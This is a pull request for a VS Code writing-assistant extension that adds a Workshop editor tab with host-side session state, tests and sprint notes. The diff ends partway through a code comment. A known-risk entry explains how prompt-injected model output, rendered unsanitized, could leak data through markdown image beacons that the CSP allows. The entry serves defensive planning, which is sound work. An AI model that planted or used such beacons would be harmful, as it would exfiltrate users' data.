### PR TITLE
feat(workshop): Sprint 02 — Session Spine (single streaming turn, host-side session)

### DIFF
--- a/.todo/epics/epic-workshop-editor-tab-2026-07-03/epic-workshop-editor-tab-2026-07-03.md
+++ b/.todo/epics/epic-workshop-editor-tab-2026-07-03/epic-workshop-editor-tab-2026-07-03.md
@@ -2,7 +2,7 @@
 
 **Created**: 2026-07-06
 **Status**: In Progress
-**Progress**: 1/4 sprints complete (Sprint 01 merged 2026-07-06, [PR #66](https://github.com/okeylanders/prose-minion-vscode/pull/66))
+**Progress**: 2/4 sprints complete (Sprint 01 merged 2026-07-06, [PR #66](https://github.com/okeylanders/prose-minion-vscode/pull/66); Sprint 02 merged 2026-07-07, [PR #67](https://github.com/okeylanders/prose-minion-vscode/pull/67))
 **Design source**: [Direction B — Split & Pinned](../../design/Prose%20Minion%20-%20Assistant%20Tab.html)
 **ADR**: [2026-07-03 — Assistant as a Full Editor Tab](../../adr/2026-07-03-assistant-editor-tab.md)
 **Integration branch**: `epic/workshop-editor-tab`
@@ -37,7 +37,7 @@ Each sprint is independently shippable behind the (initially unregistered)
 | # | Branch | Sprint | Proves |
 |---|--------|--------|--------|
 | 1 | `claude/sprint-01-workshop-editor-tab-u49fd5` ([PR #66](https://github.com/okeylanders/prose-minion-vscode/pull/66)) | [Shell](sprints/01-shell.md) | The second surface exists and boots. Zero AI. |
-| 2 | `feat/workshop-s2-session-spine` | [Session spine](sprints/02-session-spine.md) | Host-side session state + one streaming turn into the thread. |
+| 2 | `claude/sprint-02-session-spine-skndyo` ([PR #67](https://github.com/okeylanders/prose-minion-vscode/pull/67)) | [Session spine](sprints/02-session-spine.md) | Host-side session state + one streaming turn into the thread. |
 | 3 | `feat/workshop-s3-multiturn` | [Multi-turn](sprints/03-multiturn.md) | Follow-ups continue the same conversation. The "now tighten it" loop. |
 | 4 | `feat/workshop-s4-actions-polish` | [Actions & polish](sprints/04-actions-polish.md) | The approved prototype's feel: quick actions, cards, toasts. |
 

--- a/.todo/epics/epic-workshop-editor-tab-2026-07-03/epic-workshop-editor-tab-2026-07-03.md
+++ b/.todo/epics/epic-workshop-editor-tab-2026-07-03/epic-workshop-editor-tab-2026-07-03.md
@@ -78,9 +78,16 @@ Final step after Sprint 4 merges: one PR `epic/workshop-editor-tab → main`.
   *supports* continuation (`startConversation` / `addMessage` / `getMessages`),
   but token budgeting across turns, system-prompt handling on continuation, and
   conversation disposal on reset are unproven. Sized in Sprint 3.
-- `ConversationManager` still logs via raw `console.*` (e.g. the cleanup log).
-  Migrate to the injected `LogSink` while we're in there — ADR 2026-06-18
-  Step-2 leftover.
+- ~~`ConversationManager` still logs via raw `console.*`~~ — migrated to the
+  injected `LogSink` in Sprint 02 (PR #67).
+- **Markdown sanitization (shared `MarkdownRenderer`)**: untrusted model
+  output renders via `marked()` + `dangerouslySetInnerHTML` with no
+  sanitizer, on BOTH surfaces, and the CSP's `img-src https:` permits the
+  classic markdown-image-beacon exfil for prompt-injected responses
+  (PR #67 review #13, Patricia). Inherited surface, deliberately not fixed
+  inside the Workshop sprints — sanitize ONCE in the shared renderer
+  (DOMPurify or disable raw-HTML passthrough) as its own follow-up before
+  the epic's final merge to main.
 
 ## Related
 

--- a/.todo/epics/epic-workshop-editor-tab-2026-07-03/sprints/02-session-spine.md
+++ b/.todo/epics/epic-workshop-editor-tab-2026-07-03/sprints/02-session-spine.md
@@ -1,6 +1,6 @@
 # Sprint 02: Session Spine (single turn)
 
-**Status**: In Review
+**Status**: In Review ([PR #67](https://github.com/okeylanders/prose-minion-vscode/pull/67))
 **Priority**: High
 **Branch**: `claude/sprint-02-session-spine-skndyo` → PR into `epic/workshop-editor-tab`
 **Estimated Effort**: 2–4 days

--- a/.todo/epics/epic-workshop-editor-tab-2026-07-03/sprints/02-session-spine.md
+++ b/.todo/epics/epic-workshop-editor-tab-2026-07-03/sprints/02-session-spine.md
@@ -160,10 +160,18 @@ tool a second time starts a fresh turn, not a continuation.
 5. **API-key warning stays out of the thread**: a run against a missing key
    surfaces through the error rail (`isApiKeyNotConfiguredWarning` reused);
    the session records only the attempted user turn.
-6. **Bundle delta (production build, Sprint-01 base → Sprint 02):**
-   `webview.js` 528,566 → 543,216 bytes (+14.3 KB, +2.8%); `extension.js`
-   2,230,883 → 2,240,792 bytes (+9.7 KB, +0.4%). Nowhere near needing the
-   entry split flagged in epic Known Risks.
+6. **Model browser pulled INTO this sprint** (Okey, post-F5 review): the
+   header's model chip is now the shared `ModelSelector` + `ModelBrowserModal`
+   — the exact component pair the sidebar uses, assistant scope, with only
+   the trigger reskinned in workshop.css. This was previously unscheduled
+   (the epic's "Model Browser" follow-up line covers the bigger standalone
+   feature, not this reuse). File-picker excerpt seeding from the same review
+   went to Sprint 3's task list, joining selection seeding.
+7. **Bundle delta (production build, Sprint-01 base → Sprint 02):**
+   `webview.js` 528,566 → 543,608 bytes (+14.7 KB, +2.8%); `extension.js`
+   2,230,883 → 2,240,792 bytes (+9.7 KB, +0.4%). The model-browser wiring
+   cost +392 bytes — the modal was already bundled via the sidebar. Nowhere
+   near needing the entry split flagged in epic Known Risks.
 
 ## F5 smoke recipe (run locally; remote env can't fetch VS Code)
 

--- a/.todo/epics/epic-workshop-editor-tab-2026-07-03/sprints/02-session-spine.md
+++ b/.todo/epics/epic-workshop-editor-tab-2026-07-03/sprints/02-session-spine.md
@@ -1,8 +1,8 @@
 # Sprint 02: Session Spine (single turn)
 
-**Status**: Not Started
+**Status**: In Review
 **Priority**: High
-**Branch**: `feat/workshop-s2-session-spine` → PR into `epic/workshop-editor-tab`
+**Branch**: `claude/sprint-02-session-spine-skndyo` → PR into `epic/workshop-editor-tab`
 **Estimated Effort**: 2–4 days
 **Depends on**: Sprint 01
 
@@ -33,36 +33,43 @@ tool a second time starts a fresh turn, not a continuation.
 
 ## Tasks
 
-- [ ] `packages/core/src/shared/types/messages/workshop.ts`: `WORKSHOP_RUN_TOOL`
+- [x] `packages/core/src/shared/types/messages/workshop.ts`: `WORKSHOP_RUN_TOOL`
       (toolId + excerpt ref), `WORKSHOP_RESET_SESSION`, `WORKSHOP_SET_EXCERPT`,
       `WORKSHOP_TURN` (extension→webview: a completed turn). Export from the
       messages `index.ts`. (`WORKSHOP_SEND_MESSAGE` / `WORKSHOP_QUICK_ACTION`
-      arrive in Sprints 3–4.)
-- [ ] Add `'workshop'` to `StreamingDomain` in `streaming.ts`.
-- [ ] `WorkshopSessionService` under `application/services/`: owns the session
+      arrive in Sprints 3–4.) *Also added `WORKSHOP_REQUEST_SESSION` /
+      `WORKSHOP_SESSION_STATE` — the reload-safety criterion needs a snapshot
+      pair; mount-request is the established idiom (`useModelsSettings`).*
+- [x] Add `'workshop'` to `StreamingDomain` in `streaming.ts`. *Cancel wire
+      deliberately excluded: `CancellableStreamingDomain` in
+      `streamingCancelMessages.ts` documents that the host self-preempts and
+      the webview cancel affordance arrives with the composer.*
+- [x] `WorkshopSessionService` under `application/services/`: owns the session
       aggregate — pinned excerpt + source metadata, context-brief reference,
       ordered turns (`user | assistant`), active tool. Pure, host-side,
       constructor-injected deps, unit-testable without React or vscode.
-- [ ] `WorkshopHandler` under `handlers/domain/`: constructor-injected
+- [x] `WorkshopHandler` under `handlers/domain/`: constructor-injected
       (`MessageTransport`, `LogSink`, the assistant tool service,
       `WorkshopSessionService`). Handles `WORKSHOP_RUN_TOOL` → invoke the tool,
       stream chunks under `domain: 'workshop'`, append the completed
       assistant turn to the session, post `WORKSHOP_TURN`. Handles
       `WORKSHOP_SET_EXCERPT` and `WORKSHOP_RESET_SESSION`.
-- [ ] Register `WorkshopHandler` in `MessageHandler` exactly like the other 11
+- [x] Register `WorkshopHandler` in `MessageHandler` exactly like the other 11
       (import, field, `new` from injected services, route).
-- [ ] `useWorkshop` hook under `presentation/webview/hooks/domain/` with the
+- [x] `useWorkshop` hook under `presentation/webview/hooks/domain/` with the
       tripartite State / Actions / Persistence interfaces. Consume streaming;
       render turns from `WORKSHOP_TURN` + live chunks. Wire the previously-static
       model-select and balance placeholders to `useModelsSettings`
       (`assistantModel` scope) and `useAccountBalance`.
-- [ ] `WorkshopApp` composes `useWorkshop` with `useAccountBalance`,
+- [x] `WorkshopApp` composes `useWorkshop` with `useAccountBalance`,
       `useModelsSettings`, `useTokenTracking`, `useMessageRouter`. Enable the
       tool palette; run-tool streams into the thread. Composer stays disabled
       (free text is Sprint 3).
-- [ ] Service-level unit tests for the session aggregate: set excerpt, run a
+- [x] Service-level unit tests for the session aggregate: set excerpt, run a
       tool appends a `user`+`assistant` turn pair, reset clears turns, active
-      tool tracked. No React needed.
+      tool tracked. No React needed. *(8 tests; plus 12 WorkshopHandler tests
+      and a MessageHandler-level reload-safety test: two handlers over one
+      bundle serve the same session.)*
 
 ### Carried from Sprint 01 / PR #66 review (lands WITH this sprint, not after)
 
@@ -70,24 +77,36 @@ tool a second time starts a fresh turn, not a continuation.
       `prose-minion.openWorkshop` opens the shell in a real extension host
       (do this FIRST, before wiring anything — headless boot-checks covered
       the bundle, never a live VS Code window).
-
-- [ ] **ErrorBoundary coverage in `WorkshopApp`** (#10, Sam): wrap rail /
+      **Sprint 02 outcome: environment-blocked, needs a LOCAL F5.** The
+      remote container has xvfb but the network policy 403s
+      `update.code.visualstudio.com`, so no VS Code binary can be fetched. A
+      ready-to-run `@vscode/test-electron` smoke (opens the panel, asserts
+      the `prose-minion.workshop` webview tab exists, and proves
+      reveal-idempotence — one panel, never two) is included below under
+      "F5 smoke recipe"; it was verified up to the download wall.
+- [x] **ErrorBoundary coverage in `WorkshopApp`** (#10, Sam): wrap rail /
       thread / composer sections the way `App.tsx` wraps its tabs — required
       the moment dynamic session data can throw mid-render. Static shell was
       verifiably throw-free; this sprint isn't.
-- [ ] **Single-services witness** (#12, Tim): when the panel gets its
+- [x] **Single-services witness** (#12, Tim): when the panel gets its
       `MessageHandler`, assert the one `coreServices` bundle is reused — the
       risk isn't two panels, it's two independently-polling
       `AccountBalanceService`s under `retainContextWhenHidden`.
-- [ ] **Scoped `:focus` styles in `workshop.css`** (#14, Sam): the enabled
+      *Went deeper than the witness: Tim's scenario exposed that the shared
+      services' single-slot callbacks + `MessageHandler.dispose()` would let
+      one surface's teardown blind the other. See Decisions below.*
+- [x] **Scoped `:focus` styles in `workshop.css`** (#14, Sam): the enabled
       tool palette (and later composer) must not depend on index.css's
       unscoped `input:focus` looking right by token-inheritance coincidence.
-- [ ] **CSPRNG nonce in `webviewHtml.ts`** (#15, Patricia): swap
+- [x] **CSPRNG nonce in `webviewHtml.ts`** (#15, Patricia): swap
       `Math.random()` for `crypto` before real model content renders in
       either surface.
 - [ ] *(Opportunistic, #11, Cal)*: a small fake-panel fixture would let
       `WorkshopPanelProvider`'s reveal-if-exists / dispose lifecycle get real
-      behavior tests — none exist repo-wide for providers yet.
+      behavior tests — none exist repo-wide for providers yet. *Not taken this
+      sprint; the F5 smoke suite below asserts reveal-idempotence in a live
+      host, and the MessageHandler reload-safety test covers the
+      session-survives-reopen half. A fake-panel fixture remains open.*
 
 ## Acceptance Criteria
 
@@ -109,3 +128,98 @@ tool a second time starts a fresh turn, not a continuation.
 - Keep the deterministic quick-action map out of this sprint — chips are Sprint 4.
 - Excerpt seeding from the editor selection (context menu) is Sprint 3; here
   `WORKSHOP_SET_EXCERPT` can be driven from the left-rail UI / a test.
+
+## Decisions made in-sprint (PR review starting points)
+
+1. **Two webviews, one nervous system — listener sets replace single-slot
+   callbacks.** With the panel getting its own `MessageHandler` over the
+   shared `CoreServices`, the old wiring had two failure modes: constructor
+   *steal* (last-opened surface takes `setTokenUsageCallback` /
+   `setStatusEmitter`) and dispose *blinding* (closing the Workshop cleared
+   the sidebar's callbacks and disposed the shared `AccountBalanceService`).
+   Now: `AIResourceManager.addTokenUsageListener` +
+   `addStatusListener` on AssistantTool/Dictionary/CategorySearch services,
+   each returning an unsubscribe the owning handler releases on dispose.
+   `AccountBalanceService` lifecycle moved to `extension.ts`
+   (`context.subscriptions`). Found along the way: `MessageHandler`'s own
+   direct AIRM status registration had been dead code since inception —
+   `AnalysisHandler`'s emitter overwrote it ten lines later. Removed.
+2. **Guide-loading status is gated on an active run per handler** (both
+   `AnalysisHandler` and `WorkshopHandler`): the emitters are service-level
+   and shared, so un-gated forwarding would strand one surface's "Loading
+   craft guides…" in the other with nothing to clear it. Cosmetic corollary:
+   dictionary/context runs no longer piggyback the analysis-labelled guide
+   ticker (that was an accident of the single slot).
+3. **`WORKSHOP_RESET_SESSION` keeps the pinned excerpt** — the acceptance
+   criterion says "clears the thread and active tool", and a New Session over
+   the same working text is the useful behavior. Re-pinning replaces
+   explicitly.
+4. **Session snapshots ride the replay cache** (`ResultCache.workshopSession`
+   + visibility flush in the panel), so streams completed while the tab was
+   hidden reconcile on re-reveal — same idiom as the sidebar's cached results.
+5. **API-key warning stays out of the thread**: a run against a missing key
+   surfaces through the error rail (`isApiKeyNotConfiguredWarning` reused);
+   the session records only the attempted user turn.
+6. **Bundle delta (production build, Sprint-01 base → Sprint 02):**
+   `webview.js` 528,566 → 543,216 bytes (+14.3 KB, +2.8%); `extension.js`
+   2,230,883 → 2,240,792 bytes (+9.7 KB, +0.4%). Nowhere near needing the
+   entry split flagged in epic Known Risks.
+
+## F5 smoke recipe (run locally; remote env can't fetch VS Code)
+
+One-time: `npm i -D @vscode/test-electron` (or run from a scratch folder as
+below — no repo dependency needed). Build first (`npm run build`), then with
+these two files in a scratch dir (`npm init -y && npm i @vscode/test-electron`):
+
+`runSmoke.js`:
+
+```js
+const path = require('path');
+const { runTests } = require('@vscode/test-electron');
+(async () => {
+  try {
+    await runTests({
+      extensionDevelopmentPath: '<repo>/apps/vscode-extension',
+      extensionTestsPath: path.resolve(__dirname, 'suite'),
+      launchArgs: ['--disable-workspace-trust', '--disable-extensions']
+    });
+    console.log('[f5-smoke] SUCCESS');
+  } catch (err) {
+    console.error('[f5-smoke] FAILED:', err?.message ?? err);
+    process.exit(1);
+  }
+})();
+```
+
+`suite/index.js`:
+
+```js
+const vscode = require('vscode');
+const assert = require('assert');
+const sleep = (ms) => new Promise((r) => setTimeout(r, ms));
+
+exports.run = async function run() {
+  const commands = await vscode.commands.getCommands(true);
+  assert.ok(commands.includes('prose-minion.openWorkshop'), 'command not registered');
+
+  await vscode.commands.executeCommand('prose-minion.openWorkshop');
+  await sleep(3000);
+
+  const tabs = vscode.window.tabGroups.all.flatMap((g) => g.tabs);
+  const workshopTab = tabs.find((t) => t.label === 'Workshop');
+  assert.ok(workshopTab, `no Workshop tab; saw: ${tabs.map((t) => t.label).join(', ')}`);
+  assert.ok(String(workshopTab.input?.viewType ?? '').includes('prose-minion.workshop'));
+
+  await vscode.commands.executeCommand('prose-minion.openWorkshop');
+  await sleep(1000);
+  const count = vscode.window.tabGroups.all.flatMap((g) => g.tabs)
+    .filter((t) => t.label === 'Workshop').length;
+  assert.strictEqual(count, 1, 'openWorkshop duplicated the panel');
+  console.log('[f5-smoke] PASS');
+};
+```
+
+Run: `node runSmoke.js` (Linux headless: `xvfb-run -a node runSmoke.js`).
+Sprint 2 manual pass beyond the smoke: pin a pasted excerpt, run Dialogue &
+Beats, watch it stream, reload the webview (Developer: Reload Webviews) and
+confirm the thread rehydrates, close/reopen the panel and confirm the same.

--- a/.todo/epics/epic-workshop-editor-tab-2026-07-03/sprints/02-session-spine.md
+++ b/.todo/epics/epic-workshop-editor-tab-2026-07-03/sprints/02-session-spine.md
@@ -1,6 +1,6 @@
 # Sprint 02: Session Spine (single turn)
 
-**Status**: In Review ([PR #67](https://github.com/okeylanders/prose-minion-vscode/pull/67))
+**Status**: Complete (merged 2026-07-07, [PR #67](https://github.com/okeylanders/prose-minion-vscode/pull/67) — review: all 14 Open findings addressed on-branch; Deferred #8/#12 carried into Sprint 03, #13 tracked in epic Known Risks)
 **Priority**: High
 **Branch**: `claude/sprint-02-session-spine-skndyo` → PR into `epic/workshop-editor-tab`
 **Estimated Effort**: 2–4 days

--- a/.todo/epics/epic-workshop-editor-tab-2026-07-03/sprints/03-multiturn.md
+++ b/.todo/epics/epic-workshop-editor-tab-2026-07-03/sprints/03-multiturn.md
@@ -23,10 +23,15 @@ reset) don't contaminate the session-state work.
   `getMessages`, `resetConversation`, `deleteConversation`,
   `getConversationInfo`. It **supports** multi-turn; no handler has ever driven
   it that way — today's handlers `startConversation` and stop.
-- It still logs via raw `console.*` (e.g. the old-conversation cleanup log ~line
-  107). ADR 2026-06-18 flagged migrating these to the injected `LogSink`.
+- ~~It still logs via raw `console.*`~~ **Done in Sprint 02** (PR #67): the
+  sink is constructor-injected and the cleanup log routes through it.
 - The sidebar already seeds an excerpt from the editor selection via a
   `handleAssistantSelection` path — reuse it, don't reinvent it.
+- The provenance plumbing already exists (Sprint 02): `WorkshopExcerpt` /
+  `WorkshopSetExcerptPayload` carry `sourceUri` + `relativePath`, the header
+  subtitle renders them, and `WorkshopHandler` passes `sourceUri` into the
+  tool calls. Both seeding mechanisms below are senders for fields that are
+  already wired end-to-end.
 
 ## Tasks
 
@@ -47,9 +52,22 @@ reset) don't contaminate the session-state work.
       `prose-minion.openWorkshop` (or a sibling command) that seeds the pinned
       excerpt from the current selection via the existing
       `handleAssistantSelection` seeding path → `WORKSHOP_SET_EXCERPT`.
-- [ ] Migrate `ConversationManager`'s `console.*` calls to the injected
-      `LogSink` (constructor-inject the sink; no behavior change). Clears the
-      ADR 2026-06-18 Step-2 leftover.
+- [ ] **File-picker seeding** (Okey, Sprint 02 review): a "Pin from file…"
+      affordance in the rail's excerpt block, next to paste-pinning, so both
+      paths exist. Shape: new `WORKSHOP_PICK_EXCERPT_FILE` message
+      (webview→ext) → host opens a file picker → reads the file → pins with
+      full provenance (`sourceUri` + `relativePath`) → posts
+      `WORKSHOP_SESSION_STATE`. The picker needs a host seam — handlers are
+      vscode-free, so either add a `pickFile()` method to the `shell`
+      platform port (VS Code adapter wraps `window.showOpenDialog`) or let
+      `WorkshopPanelProvider` own the dialog and forward the chosen path.
+      Prefer the port: it keeps the flow inside `WorkshopHandler` where the
+      session mutation lives. Guardrail: pin the file's CONTENT as the
+      excerpt; if the file is huge, take a sane head-slice and say so in the
+      UI rather than silently pinning a novel.
+- [x] ~~Migrate `ConversationManager`'s `console.*` calls to the injected
+      `LogSink`~~ **Done early, in Sprint 02** (PR #67 — it was on the same
+      seam as the multicast work). Nothing left here.
 - [ ] Multi-turn service tests: a follow-up appends to the same conversation
       (message count grows, id stable); reset disposes the conversation; a new
       run after reset starts a fresh id.
@@ -62,8 +80,10 @@ reset) don't contaminate the session-state work.
   on reset; a post-reset run starts a new conversation.
 - Opening the Workshop from an editor selection pins that selection as the
   excerpt.
-- `ConversationManager` no longer calls `console.*`; logs route through
-  `LogSink`. No behavior change beyond logging.
+- "Pin from file…" pins a picked file's content with `relativePath` shown in
+  the header subtitle and excerpt block — same provenance as selection
+  seeding.
+- ~~`ConversationManager` no longer calls `console.*`~~ (landed in Sprint 02).
 - Token tracking reflects multi-turn accumulation; the budgeting decision is
   documented.
 - Multi-turn service tests pass; lint, typecheck, tests, build, bundle green.

--- a/apps/vscode-extension/src/__tests__/application/providers/__snapshots__/webviewHtml.test.ts.snap
+++ b/apps/vscode-extension/src/__tests__/application/providers/__snapshots__/webviewHtml.test.ts.snap
@@ -6,12 +6,12 @@ exports[`getWebviewHtml pins the sidebar surface output — the extraction promi
 <head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src https://test.csp-source 'unsafe-inline'; script-src https://test.csp-source 'nonce-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'; img-src https://test.csp-source https: data:;">
+  <meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src https://test.csp-source 'unsafe-inline'; script-src https://test.csp-source 'nonce-QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC'; img-src https://test.csp-source https: data:;">
   <title>Prose Minion Tools</title>
 </head>
 <body>
   <div id="root" style="padding:8px;font-family:var(--vscode-font-family);color:var(--vscode-foreground)">Loading Prose Minion…</div>
-  <script nonce="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa">
+  <script nonce="QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC">
     window.proseMinonAssets = {
       vhsLoadingGif: "https://webview.test/ext/assets/assistant-working-prose-minion-my-world-is-user-generated.gif",
       loadingGifs: [
@@ -30,7 +30,7 @@ exports[`getWebviewHtml pins the sidebar surface output — the extraction promi
       }
     };
   </script>
-  <script nonce="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa">
+  <script nonce="QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC">
     console.log('[Prose Minion] Webview HTML loaded');
     window.addEventListener('error', function (e) {
       try {
@@ -41,7 +41,7 @@ exports[`getWebviewHtml pins the sidebar surface output — the extraction promi
       } catch {}
     });
   </script>
-  <script nonce="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" src="https://webview.test/ext/dist/webview.js"></script>
+  <script nonce="QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" src="https://webview.test/ext/dist/webview.js"></script>
 </body>
 </html>"
 `;

--- a/apps/vscode-extension/src/__tests__/application/providers/webviewHtml.test.ts
+++ b/apps/vscode-extension/src/__tests__/application/providers/webviewHtml.test.ts
@@ -9,7 +9,7 @@
  *   1. The sidebar surface's full output is PINNED by snapshot, so any
  *      Workshop-motivated edit that would silently reskin or break the
  *      sidebar fails CI. (The always-random nonce is made deterministic by
- *      pinning Math.random for the test.)
+ *      pinning crypto.randomBytes for the test.)
  *   2. The two surfaces differ ONLY by their documented deltas — <title> and
  *      the #root markup. Everything security-relevant (CSP, nonce wiring,
  *      scripts) is asserted identical.
@@ -25,6 +25,18 @@ jest.mock('p-limit', () => ({
   default: () => async (fn: () => Promise<unknown>) => fn()
 }));
 
+// Deterministic nonce: node's crypto exports are non-configurable (spyOn
+// cannot redefine them), so substitute randomBytes at the module boundary.
+// Fixed bytes -> a stable base64 token; the snapshot pins everything EXCEPT
+// the entropy source itself.
+jest.mock('crypto', () => {
+  const actual = jest.requireActual<typeof import('crypto')>('crypto');
+  return {
+    ...actual,
+    randomBytes: jest.fn((size: number) => Buffer.alloc(size, 0x42))
+  };
+});
+
 import type * as vscode from 'vscode';
 import { MessageType, PM_SURFACE_ATTR, SURFACE_WORKSHOP } from '@prose-minion/core';
 import { getWebviewHtml } from '../../../application/providers/webviewHtml';
@@ -37,16 +49,6 @@ const fakeWebview = {
 const extensionUri = { fsPath: '/ext', path: '/ext' } as unknown as vscode.Uri;
 
 describe('getWebviewHtml', () => {
-  let randomSpy: jest.SpyInstance<number, []>;
-
-  beforeEach(() => {
-    // Deterministic nonce: floor(0.42 * 62) = 26 -> 'a' for all 32 chars.
-    randomSpy = jest.spyOn(Math, 'random').mockReturnValue(0.42);
-  });
-
-  afterEach(() => {
-    randomSpy.mockRestore();
-  });
 
   it('pins the sidebar surface output — the extraction promised byte-identity, this keeps it', () => {
     const sidebar = getWebviewHtml(fakeWebview, extensionUri, 'sidebar');

--- a/apps/vscode-extension/src/__tests__/architecture/providerAssembly.test.ts
+++ b/apps/vscode-extension/src/__tests__/architecture/providerAssembly.test.ts
@@ -73,4 +73,37 @@ describe('app-shell provider assembly', () => {
     const constructionArgs = extensionSource.slice(start, end);
     expect(constructionArgs).toContain('coreServices');
   });
+
+  it('every MessageHandler in a provider is built over the ONE injected coreServices bundle (PR #66 review #12)', () => {
+    // The risk is not two panels — it is two independently-assembled service
+    // bundles (e.g. a second polling AccountBalanceService) hiding behind
+    // retainContextWhenHidden. Every `new MessageHandler(` in every provider
+    // must take `this.coreServices` as its first argument, verbatim.
+    const offenders: string[] = [];
+    for (const file of collectSourceFiles(PROVIDERS_ROOT)) {
+      const source = fs.readFileSync(file, 'utf8');
+      let cursor = 0;
+      for (;;) {
+        const start = source.indexOf('new MessageHandler(', cursor);
+        if (start === -1) {
+          break;
+        }
+        const end = source.indexOf(');', start);
+        const constructionArgs = source.slice(start, end === -1 ? source.length : end);
+        if (!/new MessageHandler\(\s*this\.coreServices\b/.test(constructionArgs)) {
+          offenders.push(path.relative(APP_SRC_ROOT, file));
+        }
+        cursor = start + 'new MessageHandler('.length;
+      }
+    }
+    expect(offenders).toEqual([]);
+
+    // And the Workshop provider actually HAS its per-webview seam now
+    // (Sprint 2) — the witness above must be guarding something real.
+    const workshopSource = fs.readFileSync(
+      path.join(PROVIDERS_ROOT, 'WorkshopPanelProvider.ts'),
+      'utf8'
+    );
+    expect(workshopSource).toContain('new MessageHandler(');
+  });
 });

--- a/apps/vscode-extension/src/application/providers/WorkshopPanelProvider.ts
+++ b/apps/vscode-extension/src/application/providers/WorkshopPanelProvider.ts
@@ -7,22 +7,33 @@
  * retained while hidden so the panel survives tab switches (v1 persistence;
  * the WebviewPanelSerializer is explicitly out of scope).
  *
- * Sprint 1 (shell): the panel renders the static <WorkshopApp/> root from the
- * shared webview bundle — no domain messages, no session state. CoreServices
- * and Platform are injected NOW so Sprint 2 can hand them to a MessageHandler
- * without re-plumbing the constructor. Nothing is `new`-ed here (ADR
- * 2026-06-18 composition-root invariant; witnessed in __tests__/architecture).
+ * Sprint 2 (session spine): the panel gets its own MessageHandler — the ONE
+ * sanctioned `new` (the per-webview message seam, same as the sidebar) —
+ * built from the SAME injected CoreServices bundle constructed in
+ * extension.ts. Nothing else is `new`-ed here (ADR 2026-06-18 composition-
+ * root invariant; witnessed in __tests__/architecture, including the
+ * single-bundle assertion). Session state lives in the shared
+ * WorkshopSessionService inside that bundle, so closing and reopening the
+ * panel rehydrates the thread.
  */
 
 import * as vscode from 'vscode';
 // All core symbols via the public barrel (ADR 2026-06-16 monorepo boundary).
-import { CoreServices, Platform, SURFACE_WORKSHOP, coerceWebviewErrorText } from '@prose-minion/core';
+import {
+  CoreServices,
+  MessageHandler,
+  Platform,
+  SURFACE_WORKSHOP,
+  coerceWebviewErrorText,
+} from '@prose-minion/core';
 import { getWebviewHtml } from './webviewHtml';
 
 export class WorkshopPanelProvider implements vscode.Disposable {
   public static readonly viewType = 'prose-minion.workshop';
 
   private panel?: vscode.WebviewPanel;
+  private messageHandler?: MessageHandler;
+  private configWatcher?: vscode.Disposable;
 
   constructor(
     private readonly extensionUri: vscode.Uri,
@@ -54,22 +65,54 @@ export class WorkshopPanelProvider implements vscode.Disposable {
     panel.iconPath = vscode.Uri.joinPath(this.extensionUri, 'assets', 'prose-minion-book.svg');
     panel.webview.html = getWebviewHtml(panel.webview, this.extensionUri, SURFACE_WORKSHOP);
 
-    // Sprint 1 has no domain message path (that is Sprint 2's WorkshopHandler).
-    // We only surface webview boot errors so a broken shell is diagnosable from
-    // the host side. Parsing goes through the shared coercer — the same one
-    // UIHandler uses for the sidebar — which validates the IPC payload as
-    // unknown, flattens newlines, and caps length. The `[WEBVIEW ERROR]`
-    // prefix is the greppable string the sidebar has always logged under;
-    // `(workshop)` marks the surface.
+    // The per-webview message seam, over the ONE injected CoreServices bundle.
+    // Two MessageHandlers may now be live (sidebar + Workshop); shared-service
+    // registrations are listener-based so neither steals the other's signals,
+    // and dispose releases only this instance's subscriptions.
+    this.messageHandler?.dispose();
+    this.messageHandler = new MessageHandler(
+      this.coreServices,
+      (message) => panel.webview.postMessage(message),
+      this.platform,
+      this.outputChannel
+    );
+
+    // Config-change watcher lives in the shell (keeps MessageHandler
+    // vscode-free), mirroring the sidebar provider's wiring.
+    this.configWatcher?.dispose();
+    this.configWatcher = vscode.workspace.onDidChangeConfiguration(event => {
+      this.messageHandler?.handleConfigurationChange(section => event.affectsConfiguration(section));
+    });
+
+    // Webview boot errors are logged HERE with the surface tag before the
+    // domain route would swallow them into the sidebar-identical UIHandler
+    // line. Parsing goes through the shared coercer — the same one UIHandler
+    // uses — never a fork of it. Everything else routes to the handler.
     const messageSubscription = panel.webview.onDidReceiveMessage((message: unknown) => {
       const text = coerceWebviewErrorText(message);
       if (text !== undefined) {
         this.outputChannel.appendLine(`[WEBVIEW ERROR] (workshop) ${text}`);
+        return;
+      }
+      void this.messageHandler?.handleMessage(message as Parameters<MessageHandler['handleMessage']>[0]);
+    });
+
+    // Messages posted while an editor tab is hidden can be dropped even under
+    // retainContextWhenHidden — replay the cache on re-reveal, exactly like
+    // the sidebar does on visibility change.
+    const viewStateSubscription = panel.onDidChangeViewState(() => {
+      if (panel.visible) {
+        this.messageHandler?.flushCachedResults?.();
       }
     });
 
     panel.onDidDispose(() => {
       messageSubscription.dispose();
+      viewStateSubscription.dispose();
+      this.configWatcher?.dispose();
+      this.configWatcher = undefined;
+      this.messageHandler?.dispose();
+      this.messageHandler = undefined;
       this.panel = undefined;
     });
 

--- a/apps/vscode-extension/src/application/providers/WorkshopPanelProvider.ts
+++ b/apps/vscode-extension/src/application/providers/WorkshopPanelProvider.ts
@@ -22,6 +22,7 @@ import * as vscode from 'vscode';
 import {
   CoreServices,
   MessageHandler,
+  MessageType,
   Platform,
   SURFACE_WORKSHOP,
   coerceWebviewErrorText,
@@ -84,14 +85,23 @@ export class WorkshopPanelProvider implements vscode.Disposable {
       this.messageHandler?.handleConfigurationChange(section => event.affectsConfiguration(section));
     });
 
-    // Webview boot errors are logged HERE with the surface tag before the
-    // domain route would swallow them into the sidebar-identical UIHandler
-    // line. Parsing goes through the shared coercer — the same one UIHandler
-    // uses — never a fork of it. Everything else routes to the handler.
+    // BOOT errors — the HTML bootstrap's bare `{type, message}` shape, no
+    // envelope — are logged HERE with the surface tag: a pre-React failure
+    // must say which surface died, and it can never reach the router
+    // usefully. ENVELOPED webview errors (React error boundaries, with
